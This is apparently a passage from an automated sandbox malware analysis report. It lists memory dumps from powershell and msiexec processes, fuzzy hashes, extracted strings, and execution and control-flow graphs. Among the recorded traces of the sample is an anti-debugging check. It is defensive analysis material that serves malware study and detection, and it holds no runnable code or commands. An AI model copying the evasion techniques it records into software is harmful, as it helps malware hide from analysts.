                                                                                                • Instruction Fuzzy Hash: BAF0A7327083808BC716636EB4681AE7FAAFBCB25171544BEE14ECB342DD62584557A2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4cd7907ed883c026530450f98fac5920358e734965a0496e1dcb3a691e4c725f
                                                                                                • Instruction ID: 1c83eb857196a2a90f9dd44d66bd839cd39ed69461228ea2d508703e435dfa8a
                                                                                                • Opcode Fuzzy Hash: 4cd7907ed883c026530450f98fac5920358e734965a0496e1dcb3a691e4c725f
                                                                                                • Instruction Fuzzy Hash: A6F0A7313096808FCB0AAB34A05C5AD7F71FFC5715B0902AED006C7242CF355846D791
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71adcd9fa4a8b1dbff37b185f97c80f206b96a0b5c7994beb55ed84efea695af
                                                                                                • Instruction ID: a114ef697002a06fd1e7e035639cf37386a381eeef66cec22f5daea61e13b20b
                                                                                                • Opcode Fuzzy Hash: 71adcd9fa4a8b1dbff37b185f97c80f206b96a0b5c7994beb55ed84efea695af
                                                                                                • Instruction Fuzzy Hash: EAE02631304A14D7CB096774B05C6AEBAAAFFC8B29F08012EE40AC3381CF799881D3D5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9185b99d5762ea6cf24c43361fead343d5c5cf4fc84440113bc2c431dc3749f7
                                                                                                • Instruction ID: 2783f39b5ec21c80842170028ab3ec12e4bfc86685c58bfa751f2c0ee37237e3
                                                                                                • Opcode Fuzzy Hash: 9185b99d5762ea6cf24c43361fead343d5c5cf4fc84440113bc2c431dc3749f7
                                                                                                • Instruction Fuzzy Hash: 14E01231904109DFCB09EFB4F6BD4B97F34FE11205B45019DD69797695DB2026CACB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 952b39615e9ebec646312f320785c4c8709d1f6dbd5a4f98030fc559f15ab895
                                                                                                • Instruction ID: a2392f4eb06a30368a7078d2500c54e3d4ddffd5d10101291e656f9d0c41bccf
                                                                                                • Opcode Fuzzy Hash: 952b39615e9ebec646312f320785c4c8709d1f6dbd5a4f98030fc559f15ab895
                                                                                                • Instruction Fuzzy Hash: D7E01274E00205DF8744DF6CD9415ADFFF1EF49340B5085AE9409D7721E7319A118B91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fe62dff4b77107dabec18df77445dc42cee7ed1ae707452dfa5a6ee4025059ef
                                                                                                • Instruction ID: 42641e1301f1925db2e0470b9e6745e648bf524605c47fdb91aeaa198101fd8e
                                                                                                • Opcode Fuzzy Hash: fe62dff4b77107dabec18df77445dc42cee7ed1ae707452dfa5a6ee4025059ef
                                                                                                • Instruction Fuzzy Hash: CBE0DF9160E3C08FE30753A844263A23FB60F8321476542D7D2808F2A3C96E4C49D7B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4b97ef247d24875e867b5a47f37699311492cd572f3158ec6197093304b20096
                                                                                                • Instruction ID: 689ec7c2852c9d5b40b4bc2b29a43000b81d1afcc448a16ea229f70163d21e5f
                                                                                                • Opcode Fuzzy Hash: 4b97ef247d24875e867b5a47f37699311492cd572f3158ec6197093304b20096
                                                                                                • Instruction Fuzzy Hash: 6DE01A349041498FC714EF64E18A829BFB1FF49204F05029DDD0A8B355EB31A981DFC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                • Instruction ID: 493c5ee2aa2e2f17c8c753310d6d51b654baf54244715b74a31b4f83af5d8266
                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                • Instruction Fuzzy Hash: 99D067B1D042099F8780EFADD94156EFBF4EB49200F6485AED919E7301F7329A129BD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 232c66ebe195e2b5afe97c3edfe155a2ded27672de9268237752ecbbe9428e70
                                                                                                • Instruction ID: cdf5696d12c223e59d6884c9251ef34a2aa5f9f380ba0f8fdde459a62f32faab
                                                                                                • Opcode Fuzzy Hash: 232c66ebe195e2b5afe97c3edfe155a2ded27672de9268237752ecbbe9428e70
                                                                                                • Instruction Fuzzy Hash: 52D062319041099BCB08AB95F85E4BD7F74FE20205F44015DD917536D1EB2155DACBC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4a1e065f0e75ef99abf0bd5f90e25124210f0003f2b67ce4ca17a18d331881c7
                                                                                                • Instruction ID: 1ae11113975462a261449fb3fd9cbf9370762c46e5f301df225fa9b7fe8c9beb
                                                                                                • Opcode Fuzzy Hash: 4a1e065f0e75ef99abf0bd5f90e25124210f0003f2b67ce4ca17a18d331881c7
                                                                                                • Instruction Fuzzy Hash: FDD01734E041098FC704EFA4E48A46EBFB5FB44204F00416DDE0A93380EB306881CFC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c06d50654ab822be0742b6bb0ace5ada1342b8a8235d7f3e7cff600f345ee9ca
                                                                                                • Instruction ID: 932c30c92b675d6ad7925f961e4e0cf64429c7c4a7257c1befb7839046523d19
                                                                                                • Opcode Fuzzy Hash: c06d50654ab822be0742b6bb0ace5ada1342b8a8235d7f3e7cff600f345ee9ca
                                                                                                • Instruction Fuzzy Hash: 8EA001742411889BD644DA94C9A2824B761EB85619B28C8A9A91A9F296CB63E9039A40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556017483.0000000002C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C6D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_2c6d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ea4b91e3045d48e32c658e92606306028728441c4c5b618d3177a2f858416fb9
                                                                                                • Instruction ID: 7af372a54edc003dc716c85fbc9e1967df79c33631f2c9709a49fc95a0118e84
                                                                                                • Opcode Fuzzy Hash: ea4b91e3045d48e32c658e92606306028728441c4c5b618d3177a2f858416fb9
                                                                                                • Instruction Fuzzy Hash: FF21F576604344DFDB15DF10D9C4B26BB65FB84314F248569E90A4B24AC336D456CBA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 84l$84l$84l$84l
                                                                                                • API String ID: 0-3024328185
                                                                                                • Opcode ID: 4558e26f9d4bc1b16ce9b83469d833f50d90b4484fd3224cd129c54d16c75640
                                                                                                • Instruction ID: 3c5c9945695fb88e89c6c90e2144d4aea2566f598de43175e1fd83989b73328f
                                                                                                • Opcode Fuzzy Hash: 4558e26f9d4bc1b16ce9b83469d833f50d90b4484fd3224cd129c54d16c75640
                                                                                                • Instruction Fuzzy Hash: 7DA1E9B1B10205DFFB24DF98C8447EBB7A2AB89210F288467E845AF351DB71DC46D7A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fl$(fl$(fl$(fl
                                                                                                • API String ID: 0-2123353879
                                                                                                • Opcode ID: 00ef353bf74115fad8c9d7d815d2bef81f8c219b9a28e1a6cecc10c552e6cf6d
                                                                                                • Instruction ID: 1110c18f4ecc1bba722c52205ced1b7d993bf40852a5aed3a4cec15643c7ff6e
                                                                                                • Opcode Fuzzy Hash: 00ef353bf74115fad8c9d7d815d2bef81f8c219b9a28e1a6cecc10c552e6cf6d
                                                                                                • Instruction Fuzzy Hash: 72719EB0A00245DBEB24CF98C491BAEB7B2EF89314F25C56AD815AF311DB71EC41DB91

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.5%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:3.5%
                                                                                                Total number of Nodes:86
                                                                                                Total number of Limit Nodes:17
                                                                                                execution_graph 28659 2e37ec0 28660 2e37f04 CheckRemoteDebuggerPresent 28659->28660 28661 2e37f46 28660->28661 28662 2e30848 28664 2e3084e 28662->28664 28663 2e3091b 28664->28663 28667 2e31382 28664->28667 28673 2e314b0 28664->28673 28669 2e31396 28667->28669 28668 2e314a6 28668->28664 28669->28668 28672 2e314b0 5 API calls 28669->28672 28680 2e3b348 28669->28680 28685 2e3b358 28669->28685 28672->28669 28675 2e31396 28673->28675 28676 2e314b7 28673->28676 28674 2e314a6 28674->28664 28675->28674 28677 2e314b0 5 API calls 28675->28677 28678 2e3b348 5 API calls 28675->28678 28679 2e3b358 5 API calls 28675->28679 28676->28664 28677->28675 28678->28675 28679->28675 28681 2e3b351 28680->28681 28682 2e3b41f 28681->28682 28690 2e3b908 28681->28690 28696 2e3b8fc 28681->28696 28682->28669 28686 2e3b36e 28685->28686 28687 2e3b41f 28686->28687 28688 2e3b908 5 API calls 28686->28688 28689 2e3b8fc 5 API calls 28686->28689 28687->28669 28688->28686 28689->28686 28691 2e3b911 28690->28691 28692 2e3c0d5 28691->28692 28702 2e3d1f3 28691->28702 28707 2e3d150 28691->28707 28712 2e3d140 28691->28712 28692->28681 28697 2e3b911 28696->28697 28698 2e3c0d5 28697->28698 28699 2e3d1f3 5 API calls 28697->28699 28700 2e3d140 5 API calls 28697->28700 28701 2e3d150 5 API calls 28697->28701 28698->28681 28699->28697 28700->28697 28701->28697 28703 2e3d1c8 28702->28703 28704 2e3d209 28703->28704 28717 2e3e749 28703->28717 28722 2e3e758 28703->28722 28709 2e3d16d 28707->28709 28708 2e3d209 28709->28708 28710 2e3e749 5 API calls 28709->28710 28711 2e3e758 5 API calls 28709->28711 28710->28709 28711->28709 28714 2e3d153 28712->28714 28713 2e3d209 28714->28713 28715 2e3e749 5 API calls 28714->28715 28716 2e3e758 5 API calls 28714->28716 28715->28714 28716->28714 28719 2e3e75b 28717->28719 28718 2e3f166 28718->28703 28719->28718 28727 2e3f2c5 28719->28727 28735 2e3f2d8 28719->28735 28723 2e3e775 28722->28723 28724 2e3f166 28723->28724 28725 2e3f2c5 5 API calls 28723->28725 28726 2e3f2d8 5 API calls 28723->28726 28724->28703 28725->28723 28726->28723 28728 2e3f2db 28727->28728 28729 2e3f36d 28728->28729 28743 2e3f916 28728->28743 28747 2e3f90d 28728->28747 28751 2e3f81b 28728->28751 28755 2e3f824 28728->28755 28759 2e3f5c5 28728->28759 28736 2e3f2f1 28735->28736 28737 2e3f36d 28736->28737 28738 2e3f916 LdrInitializeThunk 28736->28738 28739 2e3f5c5 LdrInitializeThunk 28736->28739 28740 2e3f824 LdrInitializeThunk 28736->28740 28741 2e3f81b LdrInitializeThunk 28736->28741 28742 2e3f90d LdrInitializeThunk 28736->28742 28738->28736 28739->28736 28740->28736 28741->28736 28742->28736 28745 2e3f56e 28743->28745 28744 2e3f93f 28744->28728 28745->28744 28746 2e3f736 LdrInitializeThunk 28745->28746 28746->28745 28749 2e3f56e 28747->28749 28748 2e3f93f 28748->28728 28749->28748 28750 2e3f736 LdrInitializeThunk 28749->28750 28750->28749 28753 2e3f56e 28751->28753 28752 2e3f93f 28752->28728 28753->28752 28754 2e3f736 LdrInitializeThunk 28753->28754 28754->28753 28758 2e3f56e 28755->28758 28756 2e3f93f 28756->28728 28757 2e3f736 LdrInitializeThunk 28757->28758 28758->28756 28758->28757 28762 2e3f56e 28759->28762 28760 2e3f93f 28760->28728 28761 2e3f736 LdrInitializeThunk 28761->28762 28762->28759 28762->28760 28762->28761
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,%$p%
                                                                                                • API String ID: 0-3172132713
                                                                                                • Opcode ID: bdf54b2c8ecc1aa73342b22720368107da6f9a269137b6450e64b5cf678d5c79
                                                                                                • Instruction ID: 0abbc98badce518f225faa0b2c8c60a6a2dc9d1dd1035b31fef3d864f84d515a
                                                                                                • Opcode Fuzzy Hash: bdf54b2c8ecc1aa73342b22720368107da6f9a269137b6450e64b5cf678d5c79
                                                                                                • Instruction Fuzzy Hash: 3BD23934E00204CFDB14DF68C594A9DB7F6FF99314F6485A9E40AAB261EB35ED81CB90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 546 2e37ec0-2e37f44 CheckRemoteDebuggerPresent 548 2e37f46-2e37f4c 546->548 549 2e37f4d-2e37f88 546->549 548->549
                                                                                                APIs
                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02E37F37
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2607761365.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_2e30000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                • String ID:
                                                                                                • API String ID: 3662101638-0
                                                                                                • Opcode ID: eaa9261c0d2e4355adc71a7781d499f67fac2168e5dc352da2dad3c186e2929c
                                                                                                • Instruction ID: 82bcc56a07b27153d69952cdcc081ea6bc6475051fc31e9680cbe283d4fe99ca
                                                                                                • Opcode Fuzzy Hash: eaa9261c0d2e4355adc71a7781d499f67fac2168e5dc352da2dad3c186e2929c
                                                                                                • Instruction Fuzzy Hash: 522148B1900259CFDB10CF9AD444BEEFBF4AF49210F14846AE455B3240D778A944CFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0a36a678c569b6cf255a61b2b1b4460379e419eedd6aa780f25ada5db3926b84
                                                                                                • Instruction ID: 3adc080fc391db03e968a6c33f1be7f0a973fd9c3eb5d0fa3be519b22e77a280
                                                                                                • Opcode Fuzzy Hash: 0a36a678c569b6cf255a61b2b1b4460379e419eedd6aa780f25ada5db3926b84
                                                                                                • Instruction Fuzzy Hash: 59524D34E102098BEB14CBA8D494B9DB7BAFB99350F24846AF406EF352DB35DD41CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 449 2e3f5c5 450 2e3f5cf-2e3f5d2 449->450 451 2e3f5d7-2e3f5da 450->451 452 2e3f5e7-2e3f5ea 451->452 453 2e3f5dc-2e3f5e2 451->453 454 2e3f607-2e3f60a 452->454 455 2e3f5ec-2e3f5f5 452->455 453->452 458 2e3f62d-2e3f630 454->458 459 2e3f60c-2e3f628 454->459 456 2e3f5fb-2e3f602 455->456 457 2e3f949-2e3f955 455->457 456->454 460 2e3f632-2e3f637 458->460 461 2e3f63a-2e3f63d 458->461 459->458 460->461 464 2e3f660-2e3f663 461->464 465 2e3f63f-2e3f65b 461->465 466 2e3f665-2e3f674 464->466 467 2e3f67f-2e3f682 464->467 465->464 475 2e3f67a 466->475 476 2e3f92d 466->476 468 2e3f6a2-2e3f6a5 467->468 469 2e3f684-2e3f69d 467->469 473 2e3f6c2-2e3f6c5 468->473 474 2e3f6a7-2e3f6b0 468->474 469->468 479 2e3f6c7-2e3f6d8 473->479 480 2e3f6dd-2e3f6e0 473->480 474->457 478 2e3f6b6-2e3f6bd 474->478 475->467 484 2e3f930-2e3f939 476->484 478->473 479->480 482 2e3f6e2-2e3f6f5 480->482 483 2e3f6fa-2e3f6fd 480->483 482->483 486 2e3f703-2e3f706 483->486 487 2e3f82c-2e3f835 483->487 484->474 489 2e3f93f-2e3f948 484->489 491 2e3f713-2e3f716 486->491 492 2e3f708-2e3f70e 486->492 487->455 493 2e3f83b-2e3f84f 487->493 494 2e3f723-2e3f726 491->494 495 2e3f718-2e3f71e 491->495 492->491 493->476 496 2e3f855-2e3f85e 493->496 498 2e3f749-2e3f74c 494->498 499 2e3f728-2e3f72e 494->499 495->494 496->457 497 2e3f864-2e3f8cf call 2e30368 call 2e30b34 496->497 534 2e3f8d1 497->534 535 2e3f8da 497->535 500 2e3f765-2e3f767 498->500 501 2e3f74e-2e3f760 498->501 505 2e3f736-2e3f744 LdrInitializeThunk 499->505 502 2e3f769 500->502 503 2e3f76e-2e3f771 500->503 501->500 502->503 507 2e3f777-2e3f7dd call 2e30368 call 2e30b34 503->507 508 2e3f56e-2e3f571 503->508 505->498 538 2e3f7e8 507->538 539 2e3f7df 507->539 510 2e3f573-2e3f578 508->510 511 2e3f57b-2e3f57e 508->511 510->511 511->484 513 2e3f584-2e3f587 511->513 515 2e3f5a3-2e3f5a6 513->515 516 2e3f589-2e3f598 513->516 520 2e3f5c0-2e3f5c3 515->520 521 2e3f5a8-2e3f5bb 515->521 516->476 525 2e3f59e 516->525 520->449 520->451 521->520 525->515 534->535 535->476 538->487 539->538
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 02E3F73F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2607761365.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_2e30000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: .&t=
                                                                                                • API String ID: 2994545307-1314049440
                                                                                                • Opcode ID: 20f841d94377fa2e9bd4d83a880435be3da8a3f939e56592e9e0e0137d921fd7
                                                                                                • Instruction ID: 3081e6153aeb043b9db80fabd9f4a405ec1e2ed1977d8091e9a32493422cd354
                                                                                                • Opcode Fuzzy Hash: 20f841d94377fa2e9bd4d83a880435be3da8a3f939e56592e9e0e0137d921fd7
                                                                                                • Instruction Fuzzy Hash: 7AA13C34E402089FDB25CF99D498BADB7B2FB88315F209526E406EB795CB74DC81CB51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 540 2e37eb8-2e37f44 CheckRemoteDebuggerPresent 542 2e37f46-2e37f4c 540->542 543 2e37f4d-2e37f88 540->543 542->543
                                                                                                APIs
                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02E37F37
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2607761365.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_2e30000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                • String ID:
                                                                                                • API String ID: 3662101638-0
                                                                                                • Opcode ID: a4b6bf4c0f0e24b366f3264a5e8cd749e5221c2fa89bc3c3f0e215cdd2aababf
                                                                                                • Instruction ID: 8114893b7770bbc5e88aa2d476c4452b183a73f12b1b4ec915afb9b2e465b8fa
                                                                                                • Opcode Fuzzy Hash: a4b6bf4c0f0e24b366f3264a5e8cd749e5221c2fa89bc3c3f0e215cdd2aababf
                                                                                                • Instruction Fuzzy Hash: 602157B19002598FDB10CF9AD484BEEFBF0EF49211F14846AE455A3340C378A944CFA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 584 26ab66a0-26ab66c1 585 26ab66c3-26ab66c6 584->585 586 26ab66cc-26ab66eb 585->586 587 26ab6e67-26ab6e6a 585->587 596 26ab66ed-26ab66f0 586->596 597 26ab6704-26ab670e 586->597 588 26ab6e6c-26ab6e8b 587->588 589 26ab6e90-26ab6e92 587->589 588->589 590 26ab6e99-26ab6e9c 589->590 591 26ab6e94 589->591 590->585 594 26ab6ea2-26ab6eab 590->594 591->590 596->597 599 26ab66f2-26ab6702 596->599 602 26ab6714-26ab6723 597->602 599->602 710 26ab6725 call 26ab6eba 602->710 711 26ab6725 call 26ab6ec0 602->711 603 26ab672a-26ab672f 604 26ab673c-26ab6a19 603->604 605 26ab6731-26ab6737 603->605 626 26ab6e59-26ab6e66 604->626 627 26ab6a1f-26ab6ace 604->627 605->594 636 26ab6ad0-26ab6af5 627->636 637 26ab6af7 627->637 639 26ab6b00-26ab6b13 636->639 637->639 641 26ab6b19-26ab6b3b 639->641 642 26ab6e40-26ab6e4c 639->642 641->642 645 26ab6b41-26ab6b4b 641->645 642->627 643 26ab6e52 642->643 643->626 645->642 646 26ab6b51-26ab6b5c 645->646 646->642 647 26ab6b62-26ab6c38 646->647 659 26ab6c3a-26ab6c3c 647->659 660 26ab6c46-26ab6c76 647->660 659->660 664 26ab6c78-26ab6c7a 660->664 665 26ab6c84-26ab6c90 660->665 664->665 666 26ab6c92-26ab6c96 665->666 667 26ab6cf0-26ab6cf4 665->667 666->667 670 26ab6c98-26ab6cc2 666->670 668 26ab6cfa-26ab6d36 667->668 669 26ab6e31-26ab6e3a 667->669 681 26ab6d38-26ab6d3a 668->681 682 26ab6d44-26ab6d52 668->682 669->642 669->647 677 26ab6cd0-26ab6ced 670->677 678 26ab6cc4-26ab6cc6 670->678 677->667 678->677 681->682 684 26ab6d69-26ab6d74 682->684 685 26ab6d54-26ab6d5f 682->685 689 26ab6d8c-26ab6d9d 684->689 690 26ab6d76-26ab6d7c 684->690 685->684 688 26ab6d61 685->688 688->684 694 26ab6d9f-26ab6da5 689->694 695 26ab6db5-26ab6dc1 689->695 691 26ab6d7e 690->691 692 26ab6d80-26ab6d82 690->692 691->689 692->689 696 26ab6da9-26ab6dab 694->696 697 26ab6da7 694->697 699 26ab6dd9-26ab6e2a 695->699 700 26ab6dc3-26ab6dc9 695->700 696->695 697->695 699->669 701 26ab6dcb 700->701 702 26ab6dcd-26ab6dcf 700->702 701->699 702->699 710->603 711->603
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2629351356.0000000026AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 26AB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_26ab0000_msiexec.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,%
                                                                                                • API String ID: 0-1739194234
                                                                                                • Opcode ID: 72f9fd1810052873e2f3ee43ea50fd09e4c56626e50961edf1ee61e2b248a820
                                                                                                • Instruction ID: df9dae525b98c8e74150a3855d453e5469fe9cbb3d25eeb236012db637bfbd85
                                                                                                • Opcode Fuzzy Hash: 72f9fd1810052873e2f3ee43ea50fd09e4c56626e50961edf1ee61e2b248a820
                                                                                                • Instruction Fuzzy Hash: 54018471E002189BDB14DB79C8405DEF7FAFB89310F20957AE506FB244EA319D41CBA0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1555 26abf87d-26abf87e 1556 26abf87f-26abf882 1555->1556 1557 26abf8ae-26abf8b1 1556->1557 1558 26abf884 1556->1558 1559 26abf8b3-26abf8ba 1557->1559 1560 26abf8c5-26abf8c8 1557->1560 1561 26abf88e-26abf8a9 1558->1561 1562 26abf983-26abf984 1559->1562 1563 26abf8c0 1559->1563 1564 26abf8ca-26abf8f0 1560->1564 1565 26abf8f5-26abf8f8 1560->1565 1561->1557 1568 26abf989-26abf98c 1562->1568 1563->1560 1564->1565 1566 26abf8fa-26abf914 1565->1566 1567 26abf919-26abf91c 1565->1567 1566->1567 1570 26abf97e-26abf981 1567->1570 1571 26abf91e-26abf979 1567->1571 1572 26abf98e-26abf998 1568->1572 1573 26abf99d-26abf9a0 1568->1573 1570->1562 1570->1568 1571->1570 1572->1573 1576 26abf9aa-26abf9ad 1573->1576 1577 26abf9a2-26abf9a5 1573->1577 1578 26abf9af-26abf9c9 1576->1578 1579 26abf9ce-26abf9d1 1576->1579 1577->1576 1578->1579 1584 26abf9e8-26abf9eb 1579->1584 1585 26abf9d3-26abf9e1 1579->1585 1588 26abfa0e-26abfa11 1584->1588 1589 26abf9ed-26abfa09 1584->1589 1585->1577 1598 26abf9e3 1585->1598 1592 26abf82e-26abf834 1588->1592 1593 26abfa17-26abfa1a 1588->1593 1589->1588 1596 26abf836 1592->1596 1597 26abf7f4-26abf7fa 1592->1597 1594 26abf7df-26abf7e8 1593->1594 1595 26abfa20-26abfa23 1593->1595 1604 26abf7ea 1594->1604 1605 26abf811-26abf81a 1594->1605 1601 26abfa30-26abfa33 1595->1601 1602 26abfa25-26abfa2b 1595->1602 1603 26abf83b-26abf83e 1596->1603 1606 26abfb1b-26abfb55 1597->1606 1607 26abf800-26abf807 1597->1607 1598->1584 1609 26abfa40-26abfa43 1601->1609 1610 26abfa35-26abfa3b 1601->1610 1602->1601 1611 26abf840-26abf842 1603->1611 1612 26abf845-26abf848 1603->1612 1613 26abf7ef-26abf7f2 1604->1613 1605->1606 1616 26abf820-26abf824 1605->1616 1624 26abfb57-26abfb5a 1606->1624 1614 26abf80c-26abf80f 1607->1614 1619 26abfa45-26abfa5f 1609->1619 1620 26abfa64-26abfa67 1609->1620 1610->1609 1611->1612 1621 26abf84a-26abf86d 1612->1621 1622 26abf872-26abf875 1612->1622 1613->1597 1613->1614 1614->1605 1617 26abf829-26abf82c 1614->1617 1616->1617 1617->1592 1617->1603 1619->1620 1625 26abfa69-26abfa8e 1620->1625 1626 26abfa93-26abfa96 1620->1626 1621->1622 1622->1556 1627 26abf877-26abf87c 1622->1627 1630 26abfb5c-26abfb6a 1624->1630 1631 26abfb71-26abfb74 1624->1631 1625->1626 1628 